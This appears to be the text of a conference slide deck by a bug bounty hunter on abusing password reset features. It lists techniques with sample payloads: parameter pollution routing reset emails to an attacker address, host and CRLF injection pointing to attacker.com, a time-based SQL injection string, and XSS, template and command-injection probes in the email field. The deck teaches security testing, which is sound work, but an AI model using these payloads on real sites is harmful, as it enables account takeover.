Abusing Password Reset Functionality

Slide 1

Slide 1 text

Abusing Password Reset Functionality By Tuhin Bose

Slide 2

Slide 2 text

root@kali:~#whoami Bug Bounty Hunter CISO at Damn Secure Pentesting Hub Crowdsource Security Researcher at Detectify B. Tech in Cyber Security and Digital Forensics Ethically hacked and secured Google, National Cyber Security Center (Netherlands), NCIIPC, ISC2 (Top 25), Unilever (Top 25), Mastercard, Dell, Pinterest, SpaceX(Top 3) and many other programs

Slide 3

Slide 3 text

Conclusion & QNA What is Password Reset? Common Password Reset Implementation in Web Application Hacking Password Reset Feature AGENDA Flows of Password Reset

Slide 4

Slide 4 text

What is Password Reset?

Slide 5

Slide 5 text

If an application has a login feature then there should be a password reset feature. In order to implement a proper user management system, developers must implement a password reset feature. It allows the users to reset their accounts' password.

Slide 6

Slide 6 text

Common Password Reset Implementation in Web Applications

Slide 7

Slide 7 text

Common Password Reset Implementation in Web Applications

Slide 8

Slide 8 text

Flows of Password Reset

Slide 9

Slide 9 text

Flow of Password Reset User entered his username/email. Server send a password reset link to the user. User open the password reset link and enter the new password. Password changed.

Slide 10

Slide 10 text

Hacking Password Reset Feature

Slide 11

Slide 11 text

Password Reset Poisoning 1.

Slide 12

Slide 12 text

Password Reset Poisoning 1.

Slide 13

Slide 13 text

Password Reset Poisoning 1.

Slide 14

Slide 14 text

2. HTTP Parameter Pollution (HPP) [email protected]&[email protected] email[][email protected]&email[][email protected] [email protected]%[email protected] [email protected]|[email protected] {"email":"[email protected]","email":"[email protected]"} {"email":["[email protected]","[email protected]"]}

Slide 15

Slide 15 text

2. HTTP Parameter Pollution (HPP)

Slide 16

Slide 16 text

2. HTTP Parameter Pollution (HPP)

Slide 17

Slide 17 text

3. Insecure Direct Object Reference

Slide 18

Slide 18 text

4. Weak Encryption Sometimes developers uses weak encryption algorithms while generating password reset tokens. For example, sometimes they just encrypt the user id of user + timestrap using some weak encryption algorithms.

Slide 19

Slide 19 text

5. Password reset token leakage via referral header

Slide 20

Slide 20 text

6. Token leakage in response/JS files https://www.company.com/#/changePassword/ username/token

Slide 21

Slide 21 text

7. Session/Token is not expiring after password reset.

Slide 22

Slide 22 text

8. Paramminer : Discover hidden parameters (or append previously known parameters) in the request. Now try IDOR.

Slide 23

Slide 23 text

9. Try: POST https://attacker.com/resetpassword.php HTTP/1.1 POST @attacker.com/resetpassword.php HTTP/1.1 POST :@attacker.com/resetpassword.php HTTP/1.1 POST /[email protected] HTTP/1.1

Slide 24

Slide 24 text

[email protected]'+(select*from(select(sleep(2)))a)+' 10. SQLi

Slide 25

Slide 25 text

11. Append a .json after the endpoint.

Slide 26

Slide 26 text

12. CRLF: /resetpassword?%0d%0aHost:%20attacker.com

Slide 27

Slide 27 text

13. Application Level DoS

Slide 28

Slide 28 text

14. If they are sending an otp for password reset, try 2fa bypass techniques. https://twitter.com/tuhin1729_/status/141481305505408 6152

Slide 29

Slide 29 text

15. Try homograph on password reset. [email protected] email=victim@gmаil.com [email protected] Using Unicode: Cyrillic Small Letter A

Slide 30

Slide 30 text

16. Change the request method and content-type and observe how the application is responding.

Slide 31

Slide 31 text

17. Append null bytes after your email and observe the response.

Slide 32

Slide 32 text

18. Try XSS, SSTI, Command Injection etc in the email field. hello+(alert(1))@gmail.com "<%= 7 * 7 %>"@gmail.com hello+(${{7*7}})@gmail.com hello@`whoami`.xyz.burpcollaborator.net

Slide 33

Slide 33 text

19. Missing Rate Limit

Slide 34

Slide 34 text

More: https://twitter.com/tuhin1729_/status/1437471718 142976007

Slide 35

Slide 35 text

@tuhin1729 [email protected]